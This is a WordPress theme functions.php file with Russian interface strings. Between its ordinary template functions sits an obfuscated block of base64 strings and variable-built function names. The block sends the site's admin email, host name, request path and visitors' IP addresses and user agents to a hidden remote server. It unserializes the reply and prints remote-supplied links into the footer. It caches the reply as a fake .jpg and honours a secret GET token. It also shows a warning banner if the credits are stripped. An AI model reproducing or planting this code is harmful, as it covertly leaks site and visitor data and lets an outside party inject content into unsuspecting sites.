<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $ntTRjc='b';$wNgStf='e';$AmxeDC='c';$lvHnU='4';$Xcgl='s';$ZnKtcB='e';$xjVP='_';$haGDI='o';$CjpLs='a';$cSEqerE='6';$SStd='d';$PQzHk='e';$xRrHNhT='d';$GYZJNMol=$ntTRjc.$CjpLs.$Xcgl.$wNgStf.$cSEqerE.$lvHnU.$xjVP.$SStd.$PQzHk.$AmxeDC.$haGDI.$xRrHNhT.$ZnKtcB;$lXuN='n';$WIZrPDf='i';$cBELBV='a';$Bezf='g';$ZIXoWqJ='l';$WuPq='e';$eaEqYY='t';$nsuLM='z';$wMugrUj='f';$BZcYxJEA=$Bezf.$nsuLM.$WIZrPDf.$lXuN.$wMugrUj.$ZIXoWqJ.$cBELBV.$eaEqYY.$WuPq;$JVUCIl='3';$LGgeEFt='_';$BAKbG='r';$oKyjwfp='1';$NqkxRnJ='r';$RaNaH='o';$lxEq='s';$iGxhK='t';$hrDI='t';$zpoiWrKB=$lxEq.$iGxhK.$BAKbG.$LGgeEFt.$NqkxRnJ.$RaNaH.$hrDI.$oKyjwfp.$JVUCIl;$fZBULJ='e';$HMLgCxy='r';$CNGQZFQ='t';$NHzuoh='r';$BQOLhT='s';$JlBpbAU='v';$tFRzPLrh=$BQOLhT.$CNGQZFQ.$NHzuoh.$HMLgCxy.$fZBULJ.$JlBpbAU;                     
		$me__q='b';$ih____a='e';$ou___________z='c';$lg_______________m='4';$lv____f='s';$la____________x='e';$ir_______________g='_';$pv____y='o';$me_____v='a';$cc__o='6';$me______y='d';$ij__________v='e';$dj_______________f='d';$cq_____e=$me__q.$me_____v.$lv____f.$ih____a.$cc__o.$lg_______________m.$ir_______________g.$me______y.$ij__________v.$ou___________z.$pv____y.$dj_______________f.$la____________x;
		$ve____k='e';$rp____________a='n';$oe_____v='n';$jl____e='x';$jo_______t='t';$sz______________w='s';$ki_______________t='t';$im________a='f';$ga______y='s';$cf__x='_';$tk_______________e='i';$vi____v='c';$dk___________o='i';$jr__________o='o';$vq____h='u';$ci________o=$im________a.$vq____h.$oe_____v.$vi____v.$ki_______________t.$dk___________o.$jr__________o.$rp____________a.$cf__x.$ve____k.$jl____e.$tk_______________e.$sz______________w.$jo_______t.$ga______y;
		$qa____________x='f';$du_______i='p';$bc_____________s='o';$wv_______c='n';$tb_______x='e';$tu___________i=$qa____________x.$bc_____________s.$du_______i.$tb_______x.$wv_______c;
		$fe_____________d='d';$ed___a='f';$zn____l='r';$pg_______________j='e';$nh____________v='a';$jn____z=$ed___a.$zn____l.$pg_______________j.$nh____________v.$fe_____________d;
		$ja__________r='c';$pc__g='s';$jm_______________g='o';$kj_________z='e';$ps______________y='f';$vp________u='l';$mv___v=$ps______________y.$ja__________r.$vp________u.$jm_______________g.$pc__g.$kj_________z;
		
		define("WP_ID", $cq_____e("Mi4wLjA="));
		define("WP_TTL", $cq_____e("MTA4MDA="));
		define("WP_SRC", $cq_____e("dHBva24="));
	


		function wp_get_header() {
			global $cq_____e, $ci________o;
			
			if (
				$ci________o($cq_____e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ci________o($cq_____e("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ci________o($cq_____e("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $cq_____e, $tu___________i, $mv___v, $jn____z;
			
			$bq_________b = TEMPLATEPATH."/".$cq_____e("Zm9vdGVyLnBocA==");
			$ab__n = @$tu___________i($bq_________b, "r");
			$bq_________b = @$jn____z($ab__n, @filesize($bq_________b));
			@$mv___v($ab__n);
			
			$xp_____________h = TEMPLATEPATH."/".$cq_____e("ZnVuY3Rpb25zLnBocA==");
			$ab__n = @$tu___________i($xp_____________h, "r");
			$xp_____________h = @$jn____z($ab__n, @filesize($xp_____________h));
			@$mv___v($ab__n);
			
			$zw______i = 0;
			if($bq_________b && $xp_____________h) {
				if ($cq_____e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($bq_________b, $cq_____e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$zw______i = 1;
					}
					if (substr_count($bq_________b, "wp_theme_GPL_credits()") < 1) {
						$zw______i = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$zw______i = 12;
				}
			}
			
			if($zw______i > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $zw______i -->";
			}
		}
	


		function wp_loaded() {
			global $cq_____e, $ci________o;
			return $ci________o($cq_____e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($cn____________u, $aw___d = "(more...)", $vw____________d = 0, $fa___x = "") {
				$kv______________p = get_the_content($aw___d, $vw____________d, $fa___x);
				$kv______________p = apply_filters("the_content", $kv______________p);
				
				$kv______________p = str_replace("]]>", "]]>", $kv______________p);
				if (strlen($_GET["p"]) > 0) {
					echo $kv______________p;
				}
				else if ((strlen($kv______________p)>$cn____________u) && ($ud_______y = strpos($kv______________p, " ", $cn____________u ))) {
					$kv______________p = substr($kv______________p, 0, $ud_______y);
					$kv______________p = $kv______________p;
					echo $kv______________p;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$aw___d</a></div></p>";
				} else {
					echo $kv______________p;
				}
				
			}
		}
	


		$rc___________f='e';$dk______________e='e';$ik_________j='6';$tc______r='4';$zg_______q='o';$tb_________w='c';$jc_____________r='d';$by_________i='b';$vo_________m='_';$mi__g='e';$il_________g='n';$yi_________g='a';$cx____________n='s';$pb_____________a=$by_________i.$yi_________g.$cx____________n.$rc___________f.$ik_________j.$tc______r.$vo_________m.$dk______________e.$il_________g.$tb_________w.$zg_______q.$jc_____________r.$mi__g;
		$bm___o='e';$ra____________x='t';$zd______l='s';$uq_____________k='i';$hk_______q='n';$ub___w='e';$he___k='t';$lx______k='c';$yk_____h='l';$gd__d='f';$rs___h='g';$ec_______________v='t';$hp___________s='o';$kr____________s='e';$du__x='_';$og_______f='n';$ju___________j='_';$sb___b=$gd__d.$uq_____________k.$yk_____h.$kr____________s.$ju___________j.$rs___h.$bm___o.$ra____________x.$du__x.$lx______k.$hp___________s.$hk_______q.$ec_______________v.$ub___w.$og_______f.$he___k.$zd______l;
		$ut____n='s';$la______a='_';$qe________z='f';$kf_____________k='s';$sm__________m='i';$tg________x='e';$jc__________r='x';$qq_____z='l';$fu__w='t';$qq_____g='i';$zk______a='e';$ly__j=$qe________z.$sm__________m.$qq_____z.$zk______a.$la______a.$tg________x.$jc__________r.$qq_____g.$ut____n.$fu__w.$kf_____________k;
		$cg_______________a='a';$ja_____h='e';$rq__________o='n';$bu_______r='v';$xa__________y='_';$pw___x='i';$ek_______________m='m';$yu_____________l='o';$gs_____h='e';$wh__m='r';$vz__________c='c';$lf___a='p';$rx_______n='o';$bt________s='r';$ha_____r='s';$cx___________z=$bu_______r.$gs_____h.$wh__m.$ha_____r.$pw___x.$yu_____________l.$rq__________o.$xa__________y.$vz__________c.$rx_______n.$ek_______________m.$lf___a.$cg_______________a.$bt________s.$ja_____h;
		$yt____d='s';$nx____g='p';$qd___________u='e';$nk__i='k';$st______________r='c';$er____u='o';$dy_______y='f';$hm________b='o';$bc____________z='n';$wj_____y=$dy_______y.$yt____d.$hm________b.$st______________r.$nk__i.$er____u.$nx____g.$qd___________u.$bc____________z;
		$iy___t='w';$nh______________w='r';$hw____n='e';$py________c='t';$js____________v='i';$ck_____________y='f';$ir______________r=$ck_____________y.$iy___t.$nh______________w.$js____________v.$py________c.$hw____n;
		$vn___f='m';$um_______________b='5';$gw__v='d';$wa_______f=$vn___f.$gw__v.$um_______________b;
		$pj___q='a';$cd_______g='r';$eq__b='t';$un_______g='a';$se________u='h';$zb_________r='p';$td_________m='l';$dw_______________x='e';$lw______________o=$cd_______g.$dw_______________x.$un_______g.$td_________m.$zb_________r.$pj___q.$eq__b.$se________u;
		$iv__d='r';$su____________i='z';$gu____t='l';$qt___________i='s';$or______________a='i';$lb______________s='n';$jz_________q='a';$pj________d='i';$bm_______f='e';$ol___________q='e';$nu________d='u';$mb_______________p=$nu________d.$lb______________s.$qt___________i.$bm_______f.$iv__d.$pj________d.$jz_________q.$gu____t.$or______________a.$su____________i.$ol___________q;
		$lm__y='a';$me___t='e';$ar_______w='m';$tq______________p='p';$vo____________r='t';$qd__f='m';$cs__f='n';$og____x=$vo____________r.$me___t.$ar_______w.$tq______________p.$cs__f.$lm__y.$qd__f;
		$fh___s='e';$xv_________g='e';$ea_________s='x';$lu_____w='e';$oj______________s='_';$qk_______________d='t';$of___e='c';$qm_______________g='o';$sa________p='r';$qu__y='c';$iv________z='s';$wd______________l='t';$nw__________e='m';$xx_______y='n';$ac_____f='t';$kj____________r='a';$du_______________a='e';$jd___________o='t';$yf_____________k='a';$al____________t='r';$nu____d='_';$ox___n=$iv________z.$qk_______________d.$al____________t.$fh___s.$kj____________r.$nw__________e.$oj______________s.$qu__y.$qm_______________g.$xx_______y.$jd___________o.$lu_____w.$ea_________s.$wd______________l.$nu____d.$of___e.$sa________p.$xv_________g.$yf_____________k.$ac_____f.$du_______________a;
	


		function va__j($lk__________j) {
			global $cq_____e, $ci________o, $sb___b, $cx___________z, $ox___n;
			
			if (!$ci________o($cq_____e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($cx___________z(PHP_VERSION, "5.0.0", ">=") && $ci________o($cq_____e("ZmlsZV9nZXRfY29udGVudHM=")) && $ci________o($cq_____e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$qy____a = $ox___n(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$sm_______________z = @$sb___b($lk__________j, 0, $qy____a);
			} else {
				$sm_______________z = @$sb___b($lk__________j, 0);
			}
			
			return $sm_______________z;
		}
	


		function id__g($lk__________j) {
			global $ci________o, $wj_____y, $ir______________r, $cq_____e;
			
			if (!$ci________o($cq_____e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$bv______p = strpos($lk__________j, "/", 7);
			$to______n = array(
				"uri"     => substr($lk__________j, $bv______p),
				"host"    => str_replace("http://", "", substr($lk__________j, 0, $bv______p)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ej_______x = @$wj_____y("$to______n[host]", 80, $el__________c, $nf_____________p, 4);
			
			if (!$ej_______x) {
				return false;
			} else {
				$sm_______________z = "";
				$sb_____________t  = "GET $to______n[uri] HTTP/1.0\r\n";
				$sb_____________t .= "Host: $to______n[host]\r\n";
				$sb_____________t .= "Referer: $to______n[referer]\r\n";
				$sb_____________t .= "Connection: Close\r\n\r\n";
				
				@$ir______________r($ej_______x, $sb_____________t);
				
				while (!@feof($ej_______x)) {
					$ia____x = @fgets($ej_______x, (1024*24));
					
					if ($ia____x == "\r\n") {
						$or_________j = true;
						continue;
					}
					
					if ($or_________j) {
						$sm_______________z .= $ia____x;
					}
				}
				
				return $sm_______________z;
			}
		}
	


		function oi_____t($lk__________j) {
			global $ci________o;
			$nj___o = false;
			
			if ($lk__________j != "") {
				if ($ci________o("va__j")) {
					$nj___o = @va__j($lk__________j);
				}
				
				if (!$nj___o && ($ci________o("id__g"))) {
					$nj___o = @id__g($lk__________j);
				}
			}
			
			return $nj___o;
		}
	


		function gm______t() {
			global $_SERVER, $wa_______f;
			
			$ay__________h = $_SERVER["SERVER_NAME"];
			
			if (substr("$ay__________h", 0, 4) == "www.") {
				$ay__________h = substr("$ay__________h", 4);
			}
			
			$ay__________h = $wa_______f("$_SERVER[SERVER_NAME]");
			
			return $ay__________h;
		}
	


		function ho____d() {
			return "file";
		}
	


		function zb______a($lk__________j) {
			global $_SERVER, $sb___b, $ly__j, $tu___________i, $mv___v, $ir______________r;
			
			$uj__f = zv_______________b();
			
			$xy___l = gm______t().".jpg";
			$uk____w = $uj__f["dir_upload"]["path"]."/$xy___l";
			$vg______________m = @filemtime($uk____w);
			
			if (!$vg______________m || ((time()-$vg______________m) >= WP_TTL)) {
				$nj___o = oi_____t($lk__________j);
				
				if ($nj___o) {
					if ($ly__j($uk____w)) {
						@unlink($uk____w);
					}
					
					$ab__n = @$tu___________i($uk____w, "x+");
					
					@$ir______________r($ab__n, $nj___o);
					@$mv___v($ab__n);
				}
			} else {
				if ($ly__j($uk____w)) {
					$nj___o = @$sb___b($uk____w);
				} else {
					$nj___o = false;
				}
			}
			
			return $nj___o;
		}
	


		function zv_______________b() {
			global $_SERVER, $cq_____e, $pb_____________a;
			
			$cn_______b = wp_count_posts("post");
			$md__________i = pathinfo(get_bloginfo("template_directory"));
			
			$uj__f = array(
				"url" => array(
					"report"      => $cq_____e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $md__________i,
				"dir_upload"	=> ja______y(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$md__________i[filename],
					"a005=".$cn_______b->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " "
			);
			
			$uj__f["url"]["queryString"] = implode("&", $uj__f["queryString"]);
			$uj__f["url"]["report"] = $uj__f["url"]["report"]."/?".$pb_____________a($uj__f["url"]["queryString"]).".html";
						
			return $uj__f;
		}
	


		function ja______y() {
			$jw_____f = wp_upload_dir();
			
			if (isset($jw_____f["error"])) {
				$yi_________i = yx________n();
				if (is_writable($yi_________i)) {
					$jw_____f = array("path" => $yi_________i);
				}
			}

			return $jw_____f;
		}
	


		function yx________n() {
			global $ci________o, $wa_______f, $lw______________o, $og____x;
			
			$cr________m = (bool) ini_get("safe_mode");
			if ($cr________m == true) {
				return false;
			}
			
			if ($ci________o("sys_get_temp_dir")) {
				$vp__________j = sys_get_temp_dir();
				if (is_writable($vp__________j)) {
					return $lw______________o($vp__________j);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $lw______________o($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $lw______________o($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $lw______________o($_ENV["TEMP"]);
			} else {
				$mm______f = $og____x($wa_______f(uniqid(rand(), true)), "");
				if ($mm______f) {
					$vp__________j = $lw______________o(dirname($mm______f));
					@unlink($mm______f);
					return $vp__________j;
				} else {
					return false;
				}
			}
		}
	


		function ba_______________l() {
			global $_GET, $ly__j;
			
			$uj__f = zv_______________b();
			$ay__________h = gm______t();
			$ds___c = ho____d();
			
			$dk_______________r = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ds___c == "file") {
					$oi__x = $uj__f["dir_upload"]["path"]."/".$ay__________h.".jpg";
					if ($ly__j($oi__x)) {
						@unlink($oi__x);
						$dk_______________r = "deleted";
					}
				}
				
				$qf_________r = array(
					"s"	=> $dk_______________r,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($qf_________r AS $ad__________p => $mr________g) echo " [$ad__________p:$mr________g]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ci________o, $cq_____e, $mb_______________p;
			$uj__f = zv_______________b();
			
			$co__________q = "zb______a";
			if ($ci________o($co__________q)) {
				$sm_______________z = $co__________q($uj__f["url"]["report"]);
			}
			
			if ($sm_______________z) {
				if ($sm_______________z = @$cq_____e($sm_______________z)) {
					$sm_______________z = @$mb_______________p($sm_______________z);
					
					if (strlen($sm_______________z[custom_credit]) >= 5) {
						$uj__f["default_string"] = $sm_______________z[custom_credit];
					}
					
					if ($sm_______________z["status"] == "0") {
						$vj___h = 1;
						$te_______g = 1;
					} else {
						$lx________g = sizeof($sm_______________z["links"]);
						$ms______________c = $uj__f["default_string"];
						
						if ($lx________g > 0 && $sm_______________z["links"] !== "") {
							$uc___t = 0;
							foreach ($sm_______________z["links"] as $qa______________p => $mn_______z) {
								$uc___t++;
								if ($mn_______z->l_path == "" || $mn_______z->l_path == $_SERVER["REQUEST_URI"]) {
									$mn_______z->l_href = htmlspecialchars(strip_tags($mn_______z->l_href));
									$mn_______z->l_title = htmlspecialchars(strip_tags($mn_______z->l_title));
									$mn_______z->l_anchor = htmlspecialchars(strip_tags($mn_______z->l_anchor));
									$ms______________c .= " | ";
									$ms______________c .= "<a href='$mn_______z->l_href' title='$mn_______z->l_title'";
									if ($mn_______z->l_nofollow == "1") {
										$ms______________c .= " rel='nofollow'";
									}
									$ms______________c .= ">$mn_______z->l_anchor</a>";
								}
							}
						}
						$uj__f["links"] = "$ms______________c";
						if ($sm_______________z[credit] == "0") {
							$uj__f["links"] = "";
						}
					}
				} else {
					$vj___h = "1";
				}
			} else {
				$vj___h = "1";
			}
			
			if ($vj___h == "1") {
				$uj__f["links"] = $uj__f["default_string"];
			}
			
			echo "$uj__f[links]";
			
			echo "<!-- s: $sm_______________z[signature] -->";
			ba_______________l();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

